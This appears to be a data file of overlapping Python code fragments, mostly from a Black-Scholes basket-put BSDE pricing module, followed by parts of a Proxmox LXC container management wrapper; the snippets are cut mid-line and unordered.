self.initial_value = 40. * np.ones(dimension) self.num_of_assets = dimension", "riskfree_delta = self.riskfree_scheme_delta(theta, delta_t, expect_basis, expect_brownian_basis, self.riskless_rate, regression_coeff[0, :], regression_coeff[1:1+self.num_of_brownian_motion, :]) riskfree_price =", "basis = \"Intrinsic Value\" basis_order = 3 no_of_regression = 1 + 5 +", "temp / (1 + rate * delta_t * theta[0]) def riskfree_scheme_delta(self, theta, delta_t,", "riskfree_price/ (1 + (self.bank_bond_yield + self.counterparty_bond_yield - self.counterparty_bond_repo_rate) * delta_t * theta[0])\\ +", "= np.array([38.1, 6.5, 5.7, 27.0, 22.7], dtype=np.double) strike = 1. terminal_time = 1.", "5 # Stock parameters stock_model = \"BS\" initial_value = np.array([0.01, 0.01, 0.01, 0.01,", "for BS model\" self.dimension = dimension # Market parameters and functions self.riskless_rate =", "self.riskless_rate = 0.06 self.bank_bond_yield = 0. self.counterparty_bond_yield = 0. self.counterparty_bond_repo_rate = 0. self.variation_margin_interest_rate", "/ (1 + (self.bank_bond_yield + self.counterparty_bond_yield - self.counterparty_bond_repo_rate) * delta_t * theta[0]) return", "adjusted_price.reshape((-1, 1)) # Regression functions and parameters sorting_method = \"Geometric Intrinsic Value\" basis", "self.counterparty_bond_yield - self.counterparty_bond_repo_rate) * delta_t * theta[0]) return riskfree_delta, riskfree_price.reshape((-1, 1)), adjusted_delta, adjusted_price.reshape((-1,", "adjusted_derivative, adjusted_delta): rec = np.empty((no_of_samples, self.no_of_regression)) rec[:,0] = derivative.reshape(-1) for i in range(self.num_of_brownian_motion):", "* delta_t) * np.einsum('j, ij-> i',price_coefficient, expect_basis)\\ - delta_t * theta[0] * np.einsum('i,", "self.cholesky_inverse, delta_process)\\ - delta_t * (1 - theta[0]) * np.einsum('i, ji, jk, lk", "\"BS\" self.initial_value = 40. * np.ones(dimension) self.num_of_assets = dimension self.num_of_brownian_motion = dimension self.divident_yield", "= 0.05 divident_yield = np.zeros(num_of_assets, dtype=float) bank_bond_yield = 0 counterparty_bond_yield = 0 counterparty_bond_repo_rate", "self.counterparty_bond_yield - self.counterparty_bond_repo_rate) * delta_t * theta[0])\\ + delta_t * (1 - theta[0])", "adjusted_delta, adjusted_price.reshape((-1, 1)) def regression_variable(self, no_of_samples, derivative, delta, adjusted_derivative, adjusted_delta): rec = np.empty((no_of_samples,", "\\ self.riskfree_scheme_delta(theta, delta_t, expect_basis, expect_brownian_basis, self.bank_bond_yield + self.counterparty_bond_yield - self.counterparty_bond_repo_rate , regression_coeff[1+self.num_of_brownian_motion,:], regression_coeff[2", "* theta[0] * (self.bank_bond_yield + self.counterparty_bond_yield - self.counterparty_bond_repo_rate + self.variation_margin_interest_rate) *\\ riskfree_price/ (1", "ik', regression_coeff[0, :], expect_brownian_basis) adjusted_price = self.riskfree_scheme_price(theta, delta_t, expect_basis, self.bank_bond_yield + self.counterparty_bond_yield -", "for i in range(self.num_of_brownian_motion): rec[:, i+1] = delta[:, i] rec[:, 1+self.num_of_brownian_motion] = adjusted_derivative.reshape(-1)", "self.variation_margin_interest_rate = 0.1 self.stock_repo_rate = 0.07 * np.ones(dimension, dtype=float) # Stock parameters self.stock_model", "= derivative.reshape(-1) for i in range(1,6): rec[:, i] = delta[:, i-1] rec[:, 6]", "# Stock parameters stock_model = \"BS\" initial_value = np.array([0.01, 0.01, 0.01, 0.01, 0.01])", "parameters weight = np.array([38.1, 6.5, 5.7, 27.0, 22.7], dtype=np.double) strike = 1. terminal_time", "self.terminal_time = 1. self.buy_sell = 1. self.put_call = \"Put\" def riskfree_scheme_price(self, theta, delta_t,", "- self.counterparty_bond_repo_rate , regression_coeff[1+self.num_of_brownian_motion,:], regression_coeff[2 + self.num_of_brownian_motion: 2+2* self.num_of_brownian_motion, :])\\ + (1/theta[1]) *", "* (self.bank_bond_yield + self.counterparty_bond_yield - self.counterparty_bond_repo_rate + self.variation_margin_interest_rate) *\\ riskfree_price/ (1 + (self.bank_bond_yield", "* np.ones(num_of_assets, dtype=float) def riskfree_scheme_price(self, theta, delta_t, expect_basis, rate, price_coefficient, delta_coefficient, delta_process): temp", "= \"Geometric Intrinsic Value\" basis_order = 2 no_of_regression = 1 + 5 +", "np.ones(dimension, dtype=float) # Stock parameters self.stock_model = \"BS\" self.initial_value = 40. * np.ones(dimension)", "2 no_of_regression = 1 + 5 + 1 + 5 def regression_variable(self, no_of_samples,", "regression_coeff[0, :], expect_basis) / (1 + (self.bank_bond_yield + self.counterparty_bond_yield - self.counterparty_bond_repo_rate) * delta_t", "np.identity(dimension) + 0.25 * np.ones((dimension, dimension)) self.cholesky_decomposition = np.linalg.cholesky(self.correlation_matrix) self.cholesky_inverse = np.linalg.inv(self.cholesky_decomposition) #", "(self.mu_bar + self.divident_yield - self.stock_repo_rate)/self.sigma_bar, self.cholesky_inverse, delta_coefficient, expect_basis) return temp / (1 +", "0.530]) cholesky_decomposition = np.array([[1., 0., 0., 0., 0.],\\ [0.79, 0.613107, 0., 0., 0.],\\", ":], riskfree_delta) adjusted_delta = \\ self.riskfree_scheme_delta(theta, delta_t, expect_basis, expect_brownian_basis, self.bank_bond_yield + self.counterparty_bond_yield -", "np.linalg.inv(self.cholesky_decomposition) # Product parameters self.weight = 1/dimension * np.ones(dimension, dtype=np.single) self.strike = 40.", "self.strike = 40. self.terminal_time = 1. self.buy_sell = 1. self.put_call = \"Put\" #", "return riskfree_delta, riskfree_price.reshape((-1, 1)), adjusted_delta, adjusted_price.reshape((-1, 1)) # Product parameters weight = np.array([38.1,", "= dimension # Market parameters and functions self.riskless_rate = 0.06 self.bank_bond_yield = 0.", "dtype=float) bank_bond_yield = 0 counterparty_bond_yield = 0 counterparty_bond_repo_rate = 0 variation_margin_interest_rate = 0.1", ":], regression_coeff[1:6, :], riskfree_delta) adjusted_delta = \\ self.riskfree_scheme_delta(theta, delta_t, expect_basis, expect_brownian_basis, self.bank_bond_yield +", "self.initial_value = 40. * np.ones(dimension) self.num_of_assets = dimension self.num_of_brownian_motion = dimension self.divident_yield =", "ij-> i', regression_coeff[0, :], expect_basis) / (1 + (self.bank_bond_yield + self.counterparty_bond_yield - self.counterparty_bond_repo_rate)", "self.num_of_brownian_motion def riskfree_scheme_price(self, theta, delta_t, expect_basis, rate, price_coefficient, delta_coefficient, delta_process): temp = \\", "regression_coeff[2 + self.num_of_brownian_motion: 2+2* self.num_of_brownian_motion, :])\\ + (1/theta[1]) * (1-theta[1]) * (self.bank_bond_yield +", "= 1. self.buy_sell = 1. self.put_call = \"Put\" # Regression functions and parameters", "1)) # Regression functions and parameters sorting_method = \"Geometric Intrinsic Value\" basis =", "0.134071, 0.556439, 0., 0.],\\ [0.91, 0.132277, 0.0109005, 0.39279, 0.],\\ [0.84, 0.157232, 0.0181865, 0.291768,", "self.riskfree_scheme_delta(theta, delta_t, expect_basis, expect_brownian_basis, self.bank_bond_yield + self.counterparty_bond_yield - self.counterparty_bond_repo_rate , regression_coeff[6, :], regression_coeff[7:12,", "lm', \\ (self.mu_bar + self.divident_yield - self.stock_repo_rate)/self.sigma_bar, self.cholesky_inverse, delta_coefficient, expect_brownian_basis) return riskfree_delta def", "self.counterparty_bond_repo_rate + self.variation_margin_interest_rate) *\\ riskfree_price/ (1 + (self.bank_bond_yield + self.counterparty_bond_yield - self.counterparty_bond_repo_rate) *", "regression_variable(self, no_of_samples, derivative, delta, adjusted_derivative, adjusted_delta): rec = np.empty((no_of_samples, self.no_of_regression)) rec[:,0] = derivative.reshape(-1)", "expect_basis, expect_brownian_basis): riskfree_delta = self.riskfree_scheme_delta(theta, delta_t, expect_basis, expect_brownian_basis, self.riskless_rate, regression_coeff[0, :], regression_coeff[1:6, :])", "= False refererce_adjust = False # Under development class GeometicBasketPut(): def __init__(self, dimension):", "the function file \"\"\" import numpy as np class GermenIndexPut(): # Example Information", "parameters and functions riskless_rate = 0.05 divident_yield = np.zeros(num_of_assets, dtype=float) bank_bond_yield = 0", "self.buy_sell = 1. self.put_call = \"Put\" def riskfree_scheme_price(self, theta, delta_t, expect_basis, rate, price_coefficient,", "self.counterparty_bond_yield = 0. self.counterparty_bond_repo_rate = 0. self.variation_margin_interest_rate = 0.1 self.stock_repo_rate = 0.06 *", "0.25 * np.ones((dimension, dimension)) self.cholesky_decomposition = np.linalg.cholesky(self.correlation_matrix) self.cholesky_inverse = np.linalg.inv(self.cholesky_decomposition) # Product parameters", "= 1. self.buy_sell = 1. self.put_call = \"Put\" def riskfree_scheme_price(self, theta, delta_t, expect_basis,", "+ self.num_of_brownian_motion: 2+2* self.num_of_brownian_motion, :])\\ + (1/theta[1]) * (1-theta[1]) * (self.bank_bond_yield + self.counterparty_bond_yield", "0. self.variation_margin_interest_rate = 0.1 self.stock_repo_rate = 0.06 * np.ones(dimension, dtype=float) # Stock parameters", "no_of_samples, derivative, delta, adjusted_derivative, adjusted_delta): rec = np.empty((no_of_samples, self.no_of_regression)) rec[:,0] = derivative.reshape(-1) for", "regression_coeff[2+self.num_of_brownian_motion:2+2*self.num_of_brownian_motion, :], adjusted_delta)\\ + delta_t * theta[0] * (self.bank_bond_yield + self.counterparty_bond_yield - self.counterparty_bond_repo_rate", "5.7, 27.0, 22.7], dtype=np.double) strike = 1. terminal_time = 1. buy_sell = -1.", "+ (self.bank_bond_yield + self.counterparty_bond_yield - self.counterparty_bond_repo_rate) * delta_t * theta[0]) return riskfree_delta, riskfree_price.reshape((-1,", "adjusted_derivative.reshape(-1) for i in range(self.num_of_brownian_motion): rec[:, i + 2 +self.num_of_brownian_motion] = adjusted_delta[:, i]", "in range(self.num_of_brownian_motion): rec[:, i + 2 +self.num_of_brownian_motion] = adjusted_delta[:, i] return rec #", "i] return rec # Reference Solution reference_riskfree = False refererce_adjust = False #", "= self.riskfree_scheme_price(theta, delta_t, expect_basis, self.bank_bond_yield + self.counterparty_bond_yield - self.counterparty_bond_repo_rate , regression_coeff[1+self.num_of_brownian_motion, :], regression_coeff[2+self.num_of_brownian_motion:2+2*self.num_of_brownian_motion,", "* (self.bank_bond_yield + self.counterparty_bond_yield - self.counterparty_bond_repo_rate + self.variation_margin_interest_rate) * delta_t * np.einsum('j, ijk->", "rec[:, i] = delta[:, i-1] rec[:, 6] = adjusted_derivative.reshape(-1) for i in range(7,12):", "0.],\\ [0.84, 0.157232, 0.0181865, 0.291768, 0.429207]]) cholesky_inverse = np.linalg.inv(cholesky_decomposition) # Market parameters and", "* delta_t * np.einsum('j, ijk-> ik', regression_coeff[0, :], expect_brownian_basis) adjusted_price = self.riskfree_scheme_price(theta, delta_t,", "+ (1/theta[1]) * (1-theta[1]) * (self.bank_bond_yield + self.counterparty_bond_yield - self.counterparty_bond_repo_rate + self.variation_margin_interest_rate) *", "self.riskless_rate - self.divident_yield self.sigma_bar = 0.2 * np.ones(dimension) self.correlation_matrix = 0.75 * np.identity(dimension)", "0.1 self.stock_repo_rate = 0.06 * np.ones(dimension, dtype=float) # Stock parameters self.stock_model = \"BS\"", "Value\" basis_order = 2 no_of_regression = 1 + 5 + 1 + 5", "= np.zeros(num_of_assets, dtype=float) bank_bond_yield = 0 counterparty_bond_yield = 0 counterparty_bond_repo_rate = 0 variation_margin_interest_rate", "and parameters sorting_method = \"Geometric Intrinsic Value\" basis = \"Geometric Intrinsic Value\" basis_order", "+ self.variation_margin_interest_rate) * delta_t * np.einsum('j, ijk-> ik', regression_coeff[0, :], expect_brownian_basis) adjusted_price =", "self.counterparty_bond_yield - self.counterparty_bond_repo_rate , regression_coeff[6, :], regression_coeff[7:12, :])\\ + (1/theta[1]) * (1-theta[1]) *", "+ self.divident_yield - self.stock_repo_rate)/self.sigma_bar, self.cholesky_inverse, delta_process)\\ - delta_t * (1 - theta[0]) *", "* delta_t * theta[0]) return riskfree_delta, riskfree_price.reshape((-1, 1)), adjusted_delta, adjusted_price.reshape((-1, 1)) # Regression", "* np.einsum('ij, kj ->ik', expect_basis, delta_coefficient)\\ + (1/theta[1]) * (1-(1-theta[1]) * rate *", "self.cholesky_inverse = np.linalg.inv(self.cholesky_decomposition) # Product parameters self.weight = 1/dimension * np.ones(dimension, dtype=np.single) self.strike", "dimension # Market parameters and functions self.riskless_rate = 0.06 self.bank_bond_yield = 0. self.counterparty_bond_yield", "return riskfree_delta, riskfree_price.reshape((-1, 1)), adjusted_delta, adjusted_price.reshape((-1, 1)) def regression_variable(self, no_of_samples, derivative, delta, adjusted_derivative,", "+ self.num_of_brownian_motion + 1 + self.num_of_brownian_motion def riskfree_scheme_price(self, theta, delta_t, expect_basis, rate, price_coefficient,", "+ 1 + 5 def regression_variable(self, no_of_samples, derivative, delta, adjusted_derivative, adjusted_delta): rec =", "0 counterparty_bond_repo_rate = 0 variation_margin_interest_rate = 0.1 stock_repo_rate = 0.07 * np.ones(num_of_assets, dtype=float)", "expect_brownian_basis, self.bank_bond_yield + self.counterparty_bond_yield - self.counterparty_bond_repo_rate , regression_coeff[6, :], regression_coeff[7:12, :])\\ + (1/theta[1])", "range(7,12): rec[:, i] = adjusted_delta[:, i-7] return rec # Reference Solution reference_riskfree =", "0.07 * np.ones(num_of_assets, dtype=float) def riskfree_scheme_price(self, theta, delta_t, expect_basis, rate, price_coefficient, delta_coefficient, delta_process):", "(1 + rate * delta_t * theta[0]) def riskfree_scheme_delta(self, theta, delta_t, expect_basis, expect_brownian_basis,", "regression_coeff[1+self.num_of_brownian_motion, :], regression_coeff[2+self.num_of_brownian_motion:2+2*self.num_of_brownian_motion, :], adjusted_delta)\\ + delta_t * theta[0] * (self.bank_bond_yield + self.counterparty_bond_yield", "= np.empty((no_of_samples, self.no_of_regression)) rec[:,0] = derivative.reshape(-1) for i in range(1,6): rec[:, i] =", "self.counterparty_bond_yield - self.counterparty_bond_repo_rate + self.variation_margin_interest_rate) * delta_t * np.einsum('j, ijk-> ik', regression_coeff[0, :],", "adjusted_delta, adjusted_price.reshape((-1, 1)) # Product parameters weight = np.array([38.1, 6.5, 5.7, 27.0, 22.7],", "self.counterparty_bond_yield - self.counterparty_bond_repo_rate , regression_coeff[1+self.num_of_brownian_motion,:], regression_coeff[2 + self.num_of_brownian_motion: 2+2* self.num_of_brownian_motion, :])\\ + (1/theta[1])", ", regression_coeff[0, :], regression_coeff[1:1+self.num_of_brownian_motion, :], riskfree_delta) adjusted_delta = \\ self.riskfree_scheme_delta(theta, delta_t, expect_basis, expect_brownian_basis,", "= derivative.reshape(-1) for i in range(self.num_of_brownian_motion): rec[:, i+1] = delta[:, i] rec[:, 1+self.num_of_brownian_motion]", "6.5, 5.7, 27.0, 22.7], dtype=np.double) strike = 1. terminal_time = 1. buy_sell =", "delta, adjusted_derivative, adjusted_delta): rec = np.empty((no_of_samples, self.no_of_regression)) rec[:,0] = derivative.reshape(-1) for i in", "(1 + (self.bank_bond_yield + self.counterparty_bond_yield - self.counterparty_bond_repo_rate) * delta_t * theta[0]) return riskfree_delta,", "np.array([0.518, 0.648, 0.623, 0.570, 0.530]) cholesky_decomposition = np.array([[1., 0., 0., 0., 0.],\\ [0.79,", "+ 5 + 1 + 5 def regression_variable(self, no_of_samples, derivative, delta, adjusted_derivative, adjusted_delta):", "functions and parameters self.sorting_method = \"Intrinsic Value\" self.basis = \"Intrinsic Value\" self.basis_order =", "* delta_t * theta[0]) def riskfree_scheme_delta(self, theta, delta_t, expect_basis, expect_brownian_basis, rate, price_coefficient, delta_coefficient):", "Solution reference_riskfree = False reference_riskfree_price = -0.175866 refererce_adjust = False class ArithmeticBasketPut(): def", "def __init__(self, dimension): # Market parameters and functions self.riskless_rate = 0.06 self.bank_bond_yield =", "rec[:, i + 2 +self.num_of_brownian_motion] = adjusted_delta[:, i] return rec # Reference Solution", "0.648, 0.623, 0.570, 0.530]) cholesky_decomposition = np.array([[1., 0., 0., 0., 0.],\\ [0.79, 0.613107,", "i-7] return rec # Reference Solution reference_riskfree = False reference_riskfree_price = -0.175866 refererce_adjust", "(self.bank_bond_yield + self.counterparty_bond_yield - self.counterparty_bond_repo_rate + self.variation_margin_interest_rate) *\\ riskfree_price/ (1 + (self.bank_bond_yield +", "0.429207]]) cholesky_inverse = np.linalg.inv(cholesky_decomposition) # Market parameters and functions riskless_rate = 0.05 divident_yield", ", regression_coeff[1+self.num_of_brownian_motion,:], regression_coeff[2 + self.num_of_brownian_motion: 2+2* self.num_of_brownian_motion, :])\\ + (1/theta[1]) * (1-theta[1]) *", "= np.array([0.518, 0.648, 0.623, 0.570, 0.530]) cholesky_decomposition = np.array([[1., 0., 0., 0., 0.],\\", "refererce_adjust = False class ArithmeticBasketPut(): def __init__(self, dimension): # Example Information self.name =", "rec[:,0] = derivative.reshape(-1) for i in range(self.num_of_brownian_motion): rec[:, i+1] = delta[:, i] rec[:,", "BS model\" self.dimension = dimension # Market parameters and functions self.riskless_rate = 0.06", "rec = np.empty((no_of_samples, self.no_of_regression)) rec[:,0] = derivative.reshape(-1) for i in range(self.num_of_brownian_motion): rec[:, i+1]", "\\ (1 - (1-theta[0]) * rate * delta_t) * np.einsum('j, ij-> i',price_coefficient, expect_basis)\\", "np.empty((no_of_samples, self.no_of_regression)) rec[:,0] = derivative.reshape(-1) for i in range(1,6): rec[:, i] = delta[:,", "specific example and the numerical scheme for the BSDE. .. todo:: Moving the", "expect_basis, rate, price_coefficient, delta_coefficient, delta_process): temp = \\ (1 - (1-theta[0]) * rate", "mu_bar = 0.05 * np.ones(num_of_assets, dtype=float) sigma_bar = np.array([0.518, 0.648, 0.623, 0.570, 0.530])", "\"Intrinsic Value\" self.basis_order = 3 self.no_of_regression = 1 + self.num_of_brownian_motion + 1 +", "delta_coefficient)\\ + (1/theta[1]) * (1-(1-theta[1]) * rate * delta_t) * np.einsum('j, ijk-> ik',", "0.39279, 0.],\\ [0.84, 0.157232, 0.0181865, 0.291768, 0.429207]]) cholesky_inverse = np.linalg.inv(cholesky_decomposition) # Market parameters", "parameters sorting_method = \"Geometric Intrinsic Value\" basis = \"Geometric Intrinsic Value\" basis_order =", "5 num_of_brownian_motion = 5 mu_bar = 0.05 * np.ones(num_of_assets, dtype=float) sigma_bar = np.array([0.518,", "i-7] return rec # Reference Solution reference_riskfree = False refererce_adjust = False Example", "= 1 + 5 + 1 + 5 def regression_variable(self, no_of_samples, derivative, delta,", "Solution reference_riskfree = False refererce_adjust = False # Under development class GeometicBasketPut(): def", "(1 - (1-theta[0]) * rate * delta_t) * np.einsum('j, ij-> i',price_coefficient, expect_basis)\\ -", "self.sorting_method = \"Intrinsic Value\" self.basis = \"Intrinsic Value\" self.basis_order = 3 self.no_of_regression =", "riskfree_delta, riskfree_price.reshape((-1, 1)), adjusted_delta, adjusted_price.reshape((-1, 1)) # Product parameters weight = np.array([38.1, 6.5,", "counterparty_bond_repo_rate = 0 variation_margin_interest_rate = 0.1 stock_repo_rate = 0.07 * np.ones(num_of_assets, dtype=float) def", "* np.einsum('j, ij-> i',price_coefficient, expect_basis)\\ - delta_t * theta[0] * np.einsum('i, ji, kj", "2 +self.num_of_brownian_motion] = adjusted_delta[:, i] return rec # Reference Solution reference_riskfree = False", "* np.ones(dimension) self.num_of_assets = dimension self.num_of_brownian_motion = dimension self.divident_yield = np.zeros(dimension, dtype=float) self.mu_bar", "self.divident_yield self.sigma_bar = 0.2 * np.ones(dimension) self.correlation_matrix = 0.75 * np.identity(dimension) + 0.25", "self.num_of_brownian_motion, :])\\ + (1/theta[1]) * (1-theta[1]) * (self.bank_bond_yield + self.counterparty_bond_yield - self.counterparty_bond_repo_rate +", "np.einsum('j, ij-> i',price_coefficient, expect_basis)\\ - delta_t * theta[0] * np.einsum('i, ji, kj ->", "= np.zeros(dimension, dtype=float) self.mu_bar = self.riskless_rate - self.divident_yield self.sigma_bar = 0.2 * np.ones(dimension)", "0.75 * np.identity(dimension) + 0.25 * np.ones((dimension, dimension)) self.cholesky_decomposition = np.linalg.cholesky(self.correlation_matrix) self.cholesky_inverse =" ]
[ "iter(self._containers) def __repr__(self): self._get_containers() return f\"<{self.__class__.__name__}: {repr(self._containers)}>\" def _get_containers(self): containers = [] for", "\"\"\" kwargs = {\"node\": self._node, \"vmid\": self._vmid} return self._api.suspend_container(**kwargs) def resume(self) -> str:", "for node in ProxmoxNodeDict(self._api).keys(): resp = self._api.list_containers(node) containers += [ProxmoxContainer(self._api, str(cont[\"vmid\"]), node) for", "\"\"\" Get detailed status info about this container :return: Container info in JSON-like", "int]) -> None: \"\"\" Remove container by ID :param vmid: Container ID :return:", "int = None) -> str: \"\"\" Reboot container (safely) :param timeout: Number of", "should be an integer between 100 and 999999999\") if newid < 100 or", "in resp if el[\"path\"] and el[\"type\"] == \"user\" and el[\"ugid\"].split(\"@\")[1] == \"pve\" and", "\"node\": self._node, \"vmid\": self._vmid, \"full\": '1' if full else '0'} if newnode is", "shutdown failed (optional, default=True) :return: ID of task \"\"\" kwargs = {\"node\": self._node,", "def __iter__(self): self._get_containers() return iter(self._containers) def __repr__(self): self._get_containers() return f\"<{self.__class__.__name__}: {repr(self._containers)}>\" def _get_containers(self):", "= True) -> str: \"\"\" Clone LXC container :param newid: ID of new", "their roles :return: List of tuples of ProxmoxUser objects and string names of", "\"\"\" Get a list of users with permissions for this container and their", "containers = [] for node in ProxmoxNodeDict(self._api).keys(): resp = self._api.list_containers(node) containers += [ProxmoxContainer(self._api,", "role: String name of the role :return: None \"\"\" path = \"/vms/\" +", "__repr__(self): return f\"<{self.__class__.__name__}: {self._vmid}>\" def __str__(self): return self._vmid def __eq__(self, other: 'ProxmoxContainer'): return", "None: \"\"\" Remove container by ID :param vmid: Container ID :return: None \"\"\"", "999999999\") newid = str(newid) kwargs = {\"newid\": newid, \"node\": self._node, \"vmid\": self._vmid, \"full\":", "\"vmid\": self._vmid} return self._api.suspend_container(**kwargs) def resume(self) -> str: \"\"\" Resume container WARNING: doesn't", "ProxmoxNodeDict(self._api).keys(): resp = self._api.list_containers(node) containers += [ProxmoxContainer(self._api, str(cont[\"vmid\"]), node) for cont in resp]", "and el[\"ugid\"].split(\"@\")[1] == \"pve\" and el[\"path\"] == path] def add_permission(self, user: Union[str, ProxmoxUser],", "container (get-only) \"\"\" return self._vmid @property def node(self) -> ProxmoxNode: \"\"\" :return: Node", "newid: Union[str, int], newnode: Union[str, ProxmoxNode] = None, name: str = None, full:", "a container if shutdown failed (optional, default=True) :return: ID of task \"\"\" kwargs", "self._containers.keys() def values(self): self._get_containers() return self._containers.values() def items(self): self._get_containers() return self._containers.items() def remove(self,", "str: \"\"\" Reboot container (safely) :param timeout: Number of seconds to wait (optional)", "APIWrapper): self._api = api self._containers: Dict[str, ProxmoxContainer] = {} def keys(self): self._get_containers() return", "config = self.get_config() return \"template\" in config.keys() and config[\"template\"] == 1 def clone(self,", "ProxmoxNode] = None, name: str = None, full: bool = True) -> str:", "container should be an integer between 100 and 999999999\") newid = str(newid) kwargs", "= newnode.id kwargs[\"target\"] = newnode if name is not None: kwargs[\"hostname\"] = name", "path = \"/vms/\" + self._vmid if isinstance(user, ProxmoxUser): user = user.id self._api.update_access_control_list(path=path, roles=role,", "node in ProxmoxNodeDict(self._api).keys(): resp = self._api.list_containers(node) containers += [ProxmoxContainer(self._api, str(cont[\"vmid\"]), node) for cont", "resp = self._api.list_containers(node) containers += [ProxmoxContainer(self._api, str(cont[\"vmid\"]), node) for cont in resp] self._containers", "bool: \"\"\" Whether container is currently running :return: True/False \"\"\" config = self.get_status_report()", "probably never works :return: ID of task \"\"\" kwargs = {\"node\": self._node, \"vmid\":", "\"\"\" Suspend container WARNING: doesn't appear in Proxmox GUI and probably never works", "api self._containers: Dict[str, ProxmoxContainer] = {} def keys(self): self._get_containers() return self._containers.keys() def values(self):", "LXC (optional) :param full: Whether to make storage unlinked (note that linked might", "is not None: if isinstance(newnode, ProxmoxNode): newnode = newnode.id kwargs[\"target\"] = newnode if", "role: str) -> None: \"\"\" Add new permission for this container :param user:", "== 1 def clone(self, newid: Union[str, int], newnode: Union[str, ProxmoxNode] = None, name:", "seconds to wait (optional) :param force_stop: Whether to stop a container if shutdown", "return self._api.delete_container(node=self._node, vmid=self._vmid) def start(self) -> str: \"\"\" Start container :return: ID of", "doesn't appear in Proxmox GUI and probably never works :return: ID of task", "never works :return: ID of task \"\"\" kwargs = {\"node\": self._node, \"vmid\": self._vmid}", "None) -> str: \"\"\" Reboot container (safely) :param timeout: Number of seconds to", "-> List[Tuple[ProxmoxUser, str]]: \"\"\" Get a list of users with permissions for this", "permission for this container :param user: User ID or ProxmoxUser object :param role:", "def values(self): self._get_containers() return self._containers.values() def items(self): self._get_containers() return self._containers.items() def remove(self, vmid:", "this container for all users with any role :return: None \"\"\" for user,", "items(self): self._get_containers() return self._containers.items() def remove(self, vmid: Union[str, int]) -> None: \"\"\" Remove", "\"vmid\": self._vmid} return self._api.start_container(**kwargs) def stop(self) -> str: \"\"\" Stop container (unsafely) :return:", "= {\"node\": self._node, \"vmid\": self._vmid} return self._api.resume_container(**kwargs) def view_permissions(self) -> List[Tuple[ProxmoxUser, str]]: \"\"\"", "newnode if name is not None: kwargs[\"hostname\"] = name return self._api.clone_container(**kwargs) def delete(self)", "vmid: Container ID :return: None \"\"\" vmid = str(vmid) self._get_containers() self._containers[vmid].delete() def __len__(self):", "\"\"\" Resume container WARNING: doesn't appear in Proxmox GUI and probably never works", ":param newnode: New node ID or ProxmoxNode object (optional) :param name: Name of", "of seconds to wait (optional) :param force_stop: Whether to stop a container if", "str]]: \"\"\" Get a list of users with permissions for this container and", "(optional) :return: ID of task \"\"\" kwargs = {\"node\": self._node, \"vmid\": self._vmid} if", "= {\"node\": self._node, \"vmid\": self._vmid} return self._api.start_container(**kwargs) def stop(self) -> str: \"\"\" Stop", ":param timeout: Number of seconds to wait (optional) :param force_stop: Whether to stop", "self._get_containers() return f\"<{self.__class__.__name__}: {repr(self._containers)}>\" def _get_containers(self): containers = [] for node in ProxmoxNodeDict(self._api).keys():", "== \"running\" def is_template(self) -> bool: \"\"\" Whether this container is a template", ":return: ID of task \"\"\" kwargs = {\"node\": self._node, \"vmid\": self._vmid} return self._api.stop_container(**kwargs)", "permission in self.view_permissions(): self.remove_permission(user, permission) def __repr__(self): return f\"<{self.__class__.__name__}: {self._vmid}>\" def __str__(self): return", "works :return: ID of task \"\"\" kwargs = {\"node\": self._node, \"vmid\": self._vmid} return", "__init__(self, api: APIWrapper, vmid: str, node: str): self._api = api self._vmid = vmid", "str): self._api = api self._vmid = vmid self._node = node @property def id(self)", "int], newnode: Union[str, ProxmoxNode] = None, name: str = None, full: bool =", "int(newid) except ValueError: raise ValueError(\"ID of container should be an integer between 100", "container if shutdown failed (optional, default=True) :return: ID of task \"\"\" kwargs =", "task \"\"\" kwargs = {\"node\": self._node, \"vmid\": self._vmid} return self._api.suspend_container(**kwargs) def resume(self) ->", "el[\"roleid\"]) for el in resp if el[\"path\"] and el[\"type\"] == \"user\" and el[\"ugid\"].split(\"@\")[1]", "+= [ProxmoxContainer(self._api, str(cont[\"vmid\"]), node) for cont in resp] self._containers = {cont.id: cont for", "propagate=\"0\") def remove_permission(self, user: Union[str, ProxmoxUser], role: str) -> None: \"\"\" Remove permission", "str(vmid) self._get_containers() self._containers[vmid].delete() def __len__(self): self._get_containers() return len(self._containers) def __getitem__(self, key: Union[str, int])", ":return: ID of deleting task \"\"\" return self._api.delete_container(node=self._node, vmid=self._vmid) def start(self) -> str:", "wait (optional) :param force_stop: Whether to stop a container if shutdown failed (optional,", "\"\"\" Whether this container is a template :return: True/False \"\"\" config = self.get_config()", "None: kwargs[\"timeout\"] = str(timeout) return self._api.reboot_container(**kwargs) def suspend(self) -> str: \"\"\" Suspend container", "ProxmoxUser], role: str) -> None: \"\"\" Add new permission for this container :param", "typing import Dict, List, Tuple, Any, Union class ProxmoxContainer: def __init__(self, api: APIWrapper,", "if isinstance(newnode, ProxmoxNode): newnode = newnode.id kwargs[\"target\"] = newnode if name is not", "ProxmoxUser object :param role: String name of the role :return: None \"\"\" path", "currently running :return: True/False \"\"\" config = self.get_status_report() return \"status\" in config.keys() and", "def clone(self, newid: Union[str, int], newnode: Union[str, ProxmoxNode] = None, name: str =", "resp if el[\"path\"] and el[\"type\"] == \"user\" and el[\"ugid\"].split(\"@\")[1] == \"pve\" and el[\"path\"]", "raise ValueError(\"ID of container should be an integer between 100 and 999999999\") if", "self._get_containers() return self._containers.values() def items(self): self._get_containers() return self._containers.items() def remove(self, vmid: Union[str, int])", "all permissions for this container for all users with any role :return: None", "to wait (optional) :param force_stop: Whether to stop a container if shutdown failed", "\"\"\" return ProxmoxNode(self._api, self._node) def get_status_report(self) -> Dict[str, Any]: \"\"\" Get detailed status", "full: Whether to make storage unlinked (note that linked might not be supported)", "template :return: True/False \"\"\" config = self.get_config() return \"template\" in config.keys() and config[\"template\"]", "str = None, full: bool = True) -> str: \"\"\" Clone LXC container", "el in resp if el[\"path\"] and el[\"type\"] == \"user\" and el[\"ugid\"].split(\"@\")[1] == \"pve\"", "str: \"\"\" :return: Unique ID of container (get-only) \"\"\" return self._vmid @property def", "force_stop else '0'} if timeout is not None: kwargs[\"timeout\"] = str(timeout) return self._api.shutdown_container(**kwargs)", "self._api.start_container(**kwargs) def stop(self) -> str: \"\"\" Stop container (unsafely) :return: ID of task", "containers += [ProxmoxContainer(self._api, str(cont[\"vmid\"]), node) for cont in resp] self._containers = {cont.id: cont", "Stop container (unsafely) :return: ID of task \"\"\" kwargs = {\"node\": self._node, \"vmid\":", "info about this container :return: Container info in JSON-like format \"\"\" return self._api.get_container_status(node=self._node,", "and string names of roles \"\"\" path = \"/vms/\" + self._vmid resp =", "api: APIWrapper): self._api = api self._containers: Dict[str, ProxmoxContainer] = {} def keys(self): self._get_containers()", "not be supported) (optional, default=True) :return: ID of cloning task 